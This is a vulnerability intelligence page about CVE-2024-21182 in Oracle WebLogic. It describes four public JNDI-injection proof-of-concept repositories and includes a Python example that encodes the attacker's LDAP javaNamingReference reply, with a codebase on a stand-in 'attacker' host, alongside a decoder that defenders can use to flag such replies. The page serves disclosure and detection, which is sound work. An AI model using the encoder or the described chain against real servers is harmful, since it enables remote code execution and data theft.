Oracle WebLogic Server Core Unspecified Vulnerability
CVE-2024-21182 is an unspecified vulnerability in the Core component of Oracle WebLogic Server affecting supported versions 12.2.1.4.0 and 14.1.1.0.0. Oracle describes it as easily exploitable by an unauthenticated attacker with network access to the target over the T3 or IIOP protocols; successful exploitation compromises the WebLogic Server and can yield unauthorized access to critical data, or complete access to all data reachable through the server. Oracle's advisory does not identify the vulnerable function or root cause, so the bug class cannot be determined from the advisory alone; the public proof-of-concept repositories catalogued below all treat it as a JNDI injection reachable over T3.
Exploits
4 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (2 hidden).
This repository is a small, self-contained proof-of-concept exploit for CVE-2024-21182 targeting Oracle WebLogic Server via unauthenticated JNDI injection over the T3 protocol. The repo contains 5 files: a README, two Java files, one Python server, and one Bash automation script.

The main exploit logic is in `poc/CVE_2024_21182.java`, which connects to a WebLogic T3 endpoint using `weblogic.jndi.WLInitialContextFactory`, creates an `AggregatableOpaqueReference`, injects a `MessageDestinationReference` whose `destinationJNDIName` points to an attacker LDAP URL, binds it into JNDI under the name `test`, and triggers resolution with `lookup()`. This is intended to force the target to perform a JNDI lookup against attacker infrastructure.

The attacker infrastructure is implemented in `exploit/ldap_server.py`. It starts two listeners: a raw TCP listener on port 1389 acting as a simplified LDAP responder, and an HTTP server on port 8888 serving `/Exploit.class`. Although the LDAP response is simplified and does not visibly encode the HTTP codebase in the provided snippet, the repository's intent is clearly an LDAP-to-HTTP remote class loading chain. The final payload is `exploit/Exploit.java`, a Java `ObjectFactory` whose static initializer executes `/bin/sh -c 'id; uname -a'` and prints the output, demonstrating code execution on a Unix-like victim.

The `validate.sh` script automates compilation of the payload, startup of the malicious LDAP/HTTP server, compilation of the T3 client with `lib/wlthint3client.jar`, and execution against `t3://localhost:7001` with LDAP callback `ldap://localhost:1389/Evil`. Overall, this is a real exploit PoC rather than a detector. It is operational but basic: the payload is hardcoded, the LDAP server is minimal, and the automation is geared toward lab validation. The attack vector is network-based and targets exposed WebLogic T3 services, with attacker-controlled LDAP/HTTP endpoints used to deliver the malicious Java class.
This repository is a self-contained lab exploit for Oracle WebLogic Server CVE-2024-21182, described as an unauthenticated T3/IIOP JNDI injection leading to a server-side LDAP lookup and, under the provided lab conditions, remote code execution. It is not tied to a common exploit framework; it contains custom Java, Python, Bash, and Docker components.

Structure and purpose:
- poc/CVE_2024_21182.java is the main exploit client. It connects to a WebLogic T3 endpoint, constructs a malicious weblogic.application.naming.MessageDestinationReference, reflectively inserts it into an AggregatableOpaqueReference, binds it into JNDI, and triggers lookup() so the server performs an attacker-controlled LDAP lookup.
- exploit/ldap_server.py is the attacker infrastructure. It implements a minimal LDAP server that answers searches with a javaNamingReference containing javaClassName=Exploit, javaFactory=Exploit, and javaCodeBase pointing to an HTTP server. The same script also starts an HTTP server to host the compiled class file.
- exploit/Exploit.java is the payload class. Its static initializer executes /bin/sh -c 'id ...; uname -a ...' and writes the output to /tmp/RCE_PROOF_CVE_2024_21182 on the victim.
- exploit/build.sh recompiles Exploit.java to Java 8 bytecode for compatibility with the lab's older JDK.
- docker-compose.yml provisions a vulnerable WebLogic container and an attacker container exposing the LDAP/HTTP services.
- validate.sh automates end-to-end reproduction: it waits for WebLogic readiness, copies and compiles the PoC inside the container against the live WebLogic classpath, runs the exploit against 127.0.0.1:7001 with ldap://attacker:1389/Evil, and checks for the proof file.

Main exploit capability: unauthenticated, network-triggered JNDI injection over T3, causing the target WebLogic server to initiate outbound LDAP and HTTP connections to attacker-controlled infrastructure. In the included lab this results in arbitrary command execution via remote Java class loading. On newer JDKs or patched systems the same technique may degrade to an SSRF-style outbound lookup without RCE: JDK 8u191, 7u201, 6u211 and 11.0.1 set com.sun.jndi.ldap.object.trustURLCodebase to false by default, so the JNDI client will not load a class from an LDAP-supplied javaCodeBase unless an operator has re-enabled it.

Notable targeting details: the README states Oracle WebLogic Server 12.2.1.4.0 and 14.1.1.0.0 are the CVE-listed affected versions, while the lab uses vulhub/weblogic:12.2.1.3-2018 to reproduce the vulnerable class behavior. The exploit specifically abuses the WebLogic classes AggregatableOpaqueReference and MessageDestinationReference to bypass the protections introduced for CVE-2023-21839. Overall, this is a real operational lab exploit with a working payload and attacker infrastructure, not merely a detector or README-only proof of concept.
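The two repositories above agree on the LDAP side of the chain: the victim's JNDI client searches the attacker's LDAP server and receives a javaNamingReference whose javaClassName, javaFactory and javaCodeBase attributes point it at a class served over HTTP. What follows is an added example, not code from either repository: it encodes that reply as the bytes a minimal LDAP responder puts on the wire, then decodes captured replies so that an egress sensor or honeypot can flag references that would make a JNDI client load or deserialize attacker-supplied code. The DN cn=Evil, the host name attacker and the HTTP port 8888 are assumptions modelled on the repo descriptions; the T3 client side and WebLogic's internal classes are deliberately not reproduced.

```python
"""Added example, not code from the repositories above: the LDAP reply a JNDI-injection
server returns to the WebLogic JNDI client, encoded as it goes on the wire, plus a decoder
a defender can run over captured replies to flag entries that make a JNDI client fetch or
deserialize attacker code. cn=Evil, host "attacker" and port 8888 are assumed values."""

SEQUENCE, SET, INTEGER, ENUMERATED, OCTET_STRING = 0x30, 0x31, 0x02, 0x0A, 0x04
SEARCH_RESULT_ENTRY, SEARCH_RESULT_DONE = 0x64, 0x65  # [APPLICATION 4] / [APPLICATION 5], RFC 4511

def ber_len(n: int) -> bytes:
    """BER length octets: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(body)) + body

def octet(s: str) -> bytes:
    return tlv(OCTET_STRING, s.encode())

def integer(i: int) -> bytes:
    # non-negative only; the extra byte keeps the sign bit clear (128 -> 00 80)
    return tlv(INTEGER, i.to_bytes(i.bit_length() // 8 + 1, "big"))

def search_result_entry(msg_id: int, dn: str, attrs) -> bytes:
    """Encode LDAPMessage{messageID, SearchResultEntry{dn, attrs as (type, [values])}}."""
    partial = b"".join(
        tlv(SEQUENCE, octet(atype) + tlv(SET, b"".join(octet(v) for v in vals)))
        for atype, vals in attrs)
    entry = tlv(SEARCH_RESULT_ENTRY, octet(dn) + tlv(SEQUENCE, partial))
    return tlv(SEQUENCE, integer(msg_id) + entry)

def search_result_done(msg_id: int) -> bytes:
    """LDAPResult{resultCode success(0), empty matchedDN, empty diagnosticMessage}."""
    result = tlv(ENUMERATED, b"\x00") + octet("") + octet("")
    return tlv(SEQUENCE, integer(msg_id) + tlv(SEARCH_RESULT_DONE, result))

def jndi_reference_response(msg_id: int, dn: str, class_name: str, factory: str, codebase: str) -> bytes:
    """Attacker side of the exchange: answer the victim's search with a javaNamingReference
    whose javaFactory class the JNDI client fetches from javaCodeBase and instantiates."""
    attrs = [("objectClass", ["javaNamingReference"]), ("javaClassName", [class_name]),
             ("javaFactory", [factory]), ("javaCodeBase", [codebase])]
    return search_result_entry(msg_id, dn, attrs) + search_result_done(msg_id)

def read_tlv(buf: bytes, pos: int):
    """Decode one BER element; return (tag, value, position after it)."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        n = first & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    else:
        length = first
    return tag, buf[pos:pos + length], pos + length

def parse_messages(stream: bytes):
    """Split a captured byte stream into LDAPMessages and decode every
    SearchResultEntry into (messageID, dn, {attribute: [values]})."""
    entries, pos = [], 0
    while pos < len(stream):
        tag, body, pos = read_tlv(stream, pos)
        if tag != SEQUENCE:
            raise ValueError("not an LDAPMessage")
        _, mid, p = read_tlv(body, 0)
        op_tag, op, _ = read_tlv(body, p)
        if op_tag != SEARCH_RESULT_ENTRY:
            continue  # BindResponse, SearchResultDone, ...: nothing to inspect
        _, dn, p = read_tlv(op, 0)
        _, attr_list, _ = read_tlv(op, p)
        attrs, q = {}, 0
        while q < len(attr_list):
            _, attr, q = read_tlv(attr_list, q)
            _, atype, r = read_tlv(attr, 0)
            _, vals, _ = read_tlv(attr, r)
            values, s = [], 0
            while s < len(vals):
                _, v, s = read_tlv(vals, s)
                values.append(v.decode())
            attrs[atype.decode()] = values
        entries.append((int.from_bytes(mid, "big"), dn.decode(), attrs))
    return entries

def remote_code_indicators(attrs) -> list:
    """Reasons an entry would make a JNDI client load or deserialize attacker code."""
    reasons = []
    for url in attrs.get("javaCodeBase", []):
        if url.lower().startswith(("http://", "https://", "ftp://")):
            reasons.append("javaCodeBase is a remote URL: " + url)
    if "javaFactory" in attrs:
        reasons.append("javaFactory names a class the client instantiates: " + ",".join(attrs["javaFactory"]))
    if "javaSerializedData" in attrs:
        reasons.append("javaSerializedData is deserialized by the client")
    return reasons

if __name__ == "__main__":  # constructed sample: the reply to a lookup of ldap://attacker:1389/Evil
    for mid, dn, a in parse_messages(jndi_reference_response(2, "cn=Evil", "Exploit", "Exploit", "http://attacker:8888/")):
        print(mid, dn, remote_code_indicators(a))
```

Running the module decodes the constructed reply back to message ID 2, DN cn=Evil and two indicators (remote javaCodeBase, javaFactory); a plain directory entry yields an empty list. The javaCodeBase indicator alone no longer implies RCE on JDK 8u191+ or 11.0.1+, where com.sun.jndi.ldap.object.trustURLCodebase defaults to false, which is the degradation to a bare outbound lookup noted above; javaSerializedData is flagged because it is the reference form attackers moved to once remote codebases were blocked, and the client deserializes it against its own classpath unless the newer com.sun.jndi.ldap.object.trustSerialData property is turned off.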
This repository contains a single Java proof-of-concept exploit (CVE_2024_21182.java) targeting Oracle WebLogic Server's JNDI implementation, specifically for CVE-2024-21182. The exploit demonstrates how an attacker can use the T3 protocol to connect to a vulnerable WebLogic server and bind a malicious AggregatableOpaqueReference object containing a MessageDestinationReference that points to an attacker-controlled LDAP server. This could potentially be used to trigger remote code execution or further attacks via JNDI injection. The code is a standalone POC and does not include a full exploit chain or payload delivery, but it clearly demonstrates the vulnerability mechanism. The README is minimal and only states the vulnerability context. The main fingerprintable endpoints are the T3 and LDAP URLs, which are hardcoded as placeholders in the code.
This repository contains a single Java proof-of-concept exploit for CVE-2024-21182, a JNDI injection vulnerability in Oracle WebLogic Server. The main file, CVE_2024_21182.java, demonstrates how an attacker can use the T3 protocol to connect to a vulnerable WebLogic instance and bind a malicious MessageDestinationReference object that references an attacker-controlled LDAP server. The exploit leverages internal WebLogic classes and Java reflection to craft the payload. The README.md provides a brief description and states the exploit is for educational purposes. The code is a functional POC and does not include a full malicious payload, but it shows the core technique for exploiting the vulnerability. The main network endpoints involved are the target WebLogic server (T3 protocol) and an LDAP server under the attacker's control.
Recent activity
67 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A remotely exploitable Oracle WebLogic Server vulnerability affecting versions 12.2.1.4.0 and 14.1.1.0.0 that allows unauthenticated attackers to gain remote access via exposed T3 and IIOP protocols, potentially leading to access to all data reachable through the server.
A critical Oracle WebLogic Server vulnerability that allows unauthenticated remote attackers with network access to compromise the server with low attack complexity, potentially leading to unauthorized access to critical data or complete access to all data accessible through the server.
A high-severity Oracle WebLogic Server vulnerability that allows an unauthenticated network attacker to compromise susceptible servers via T3/IIOP, potentially resulting in unauthorized access to critical data or complete access to accessible WebLogic data.
An easily exploitable Oracle WebLogic Server vulnerability that allows an unauthenticated remote attacker over T3 or IIOP to gain unauthorized access to sensitive information on affected servers.